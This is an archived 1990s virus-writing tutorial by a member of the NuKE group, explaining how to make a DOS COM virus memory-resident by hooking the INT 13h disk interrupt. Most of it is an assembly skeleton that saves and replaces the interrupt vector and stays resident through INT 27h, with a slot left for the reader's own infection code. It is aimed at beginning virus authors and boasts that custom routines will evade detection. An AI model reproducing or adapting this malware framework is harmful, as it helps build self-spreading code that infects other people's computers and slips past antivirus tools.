informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/virus/rstut002.txt

176 lines
9.1 KiB
Plaintext
Raw Permalink Blame History

***********************************
** TSR COM infections **
** **
** By Rock Steady/NuKE **
***********************************
There are several ways to constructed your viruses. Mainly you have those
which are RAM-Resident or better known as a TSR program. And with great
thought we have those which are not RAM-Resident.
A TSR virus will load into memory and can infect all programs that are
executed by the computer. Such like my AmiLiA virus which will infect all
EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot
faster compared to a Non-Resident Virus. Because a NON-Resident Virus will
only infect file each time it is ran. Though the NON-Resident will start
off very slowly infecting the system files but after the virus is in the
system after a number of weeks, it will certainly infect ALL files that are
in the system. Where a TSR virus will USUALLY infect files that are executed.
So that only files that are often executed will be infected. But The TSR
virus can certainly infect A LOT more files than a Non-Resident JUST on the
first Hour! It is out numbered 10 to 1. This is the advantage that all
programmers enjoy and program TSR viruses. I will explain a SIMPLE method of
making your program a TSR one. And it will be as flexible as you want so
that NO ONE can stay you `Stole' this information off Rock Steady.
Anyhow I will explain the simple Process of Intercepting ROM-Bios
Interrupts and hooking your virus/Program to any Interrupt of your choice.
This method that is being explained is also used ALL the Jerusalem Strains.
And several of the Vacsina Strains. They total up to close to 100+ Viruses
that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm
explaining this method your virus CANNOT be detected because of this TSR
routines because there are routines I DEVELOPED ALONE and will soon to be
release in one of my future virii. Anyhow there are an UNLIMITED amount of
ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER
get detected as a virus for all you Beginners. And how this routine can be
used in several OTHER utilities not just viruses.
Beginning...
~~~~~~~~~~~
First we must Intercept an Interrupt, Lets say we want our virus to
activate Every TIME the disk I/O is being used we would use INT 13h or
INT 21h. The INT 13h will activate everytime ANY file is opened or Closed
And the INT 21h will activity anytime any file is executed or any INT 21h
functions Like a "DIR" in DOS. If you want you can even hooked your virus
to INT 10h and it may activate when Graphics are displayed, or you can hook
it to the interrupt involved with Printer Functions. Whatever seems to
`EnLighten' you, since we live in a Distressed world, I won't even bother
why we shouldn't hooked them up to just ANY interrupt.
Anyhow, interrupts use a vector table at the bottom of memory (ROM) to
find out what routine in the ROM Bios to call. So the address for Interrupt
21h would be located at 0000:0084 and for Interrupt 13h it would be found at
0000:004Ch. So we can change theses addresses in the vector table. What we
do is we change the vector address to POINT to our virus. So everytime the
Interrupt is called it goes to the vector table and the table tells it to
call our Virus, rather than calling the ROM Bios. But what MUST do
FIRST is save the ORIGINAL Interrupt routine and place that somewhere in
memory. So that our virus will call the Original ROM Bios routine after
executing itself.
Lets say we hooked our Virus to the INT 13h, which controls all Disk
Activities. So if our Computer users tries to read something from the disk
the Computer will call the INT 13h bios Routines on How To do it. But
instead of finding the INT 13h routines it calls our virus, and the Virus
gets ran, which then our virus does what it has to do, and then runs the
Original INT 13h Routine where-ever it was stored. So it simulates an INT
call to the ROM bios routines.
;----------------------------------------------------------------
; Sample Program on how to Hook your virus to an Interrupt call.
;----------------------------------------------------------------
Code Segment
Assume cs:code,ss:code,ds:code,es:code
Org 100h ; Guess this will be a COM file? Huh?
Begin: JMP Bios_Routine
NOP ; This is just a cheap .COM file that the
NOP ; virus is attached to. Remember you should
NOP ; have the first 3 bytes written in your
INT 20h ; virus.
OLD_ROM_INT DD ? ;Our Stack to save the OLD Int Address
;----------------------------------------------------------------
; This Calls the VIRUS and then the simulates the OLD Rom Routine
;----------------------------------------------------------------
Virus_Codes PROC FAR
Assume cs:code, ds:nothing
pushf ; Everytime the ROM-Routine is call this
push ax ; is what happens... Saves the Regesters
push di ; And runs Our Virus... Then it restores
push si ; the regesters and Runs the OLD_ROM Bios
push es ; Routine that was supposed to be ran in
push ds ; the first place...
call The_Virus
pop ds ;NoTe: It's better to SAVE all Regesters and
pop es ; Flags because our Virus WILL ALTER a few
pop si ; And when the Virus leaves control back to the
pop di ; Computer it is EXPECTED to continue where it
pop ax ; It left off...
popf
pushf ; This `pushf' is NEEDED to act like a simulated
call OLD_ROM_INT ; ROM Bios Interrupt call...
ret
Virus_Codes ENDP
;----------------------------------------------------------------
; Put the REAL Virus Codes here...
;----------------------------------------------------------------
The_Virus PROC NEAR
... ; Put your OWN Virus codes here...
... ; Just make it compatible with our
... ; Codes... Try to make it small and
... ; it will take up less space in the
... ; users' memory.
...
... ;NoTe: Try to infect files that are ONLY
... ; Executed! Rather than each time the INT
... ; is used... Get it?
RET
The_Virus ENDP
;---------------------------------------------------------------
; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
; And places a Call to point to our Virus. Which then Calls the
; OLD_ROM Bios Routine. So Remember to SAVE it first.
;---------------------------------------------------------------
Bios_Routine PROC NEAR
Assume cs:code,ds:code
mov ah,35h ; This Asks for the interrupt vector!
mov al,13h ; whatever is in AL is what int vector
int 21h ; address you get and is stored in ES:BX
mov word ptr OLD_ROM_INT,bx ;Save the BX register in our Stack
mov word ptr OLD_ROM_INT[2],es ;And same to the ES Register
; Here you SHOULD put a small routine to check if the Interrupt vector has
; already been changed! For INT 13h this should contain 0000:004Ch the
; formula for this is (Interrupt # times 4) For INT 21h it is (21hx4)=84h
; and so on. So if its been changed it means the virus has already changed
; it! And it `Should' be resident. How ever this is a simple way of doing
; it. but not always the BEST way... Because any program the hooks to the
; virus interrupt will fool the virus to think it is already resident.
; Though this source is NOT for the Professional Virus Programmer like myself
; because WE KNOW! But for those that are half way there...
mov ah,25h ; This asks to set a Interrupt vector address!
mov al,13h ; Interrupt # to be set goes in AL
mov dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
int 21h
mov dx,offset Bios_Routine
int 27h
Bios_Routine ENDP
; Anything after this point will not be memory resident. because the end
; of the resident portion ends at `Bios_Routine' procedure.
Code ENDS
END Begin
;----------------------------- EnD ----------------------------------
Simple isn't it? Anyhow I tried to make this as simple as possible. I
hope I didn't lose you. Anyhow this is a simple routine that several
TSR virii use. Anyhow, see what that gives you....
Rock Steady
NukE / Viral Development Researcher
-PeAcE-
Reference in New Issue View Git Blame Copy Permalink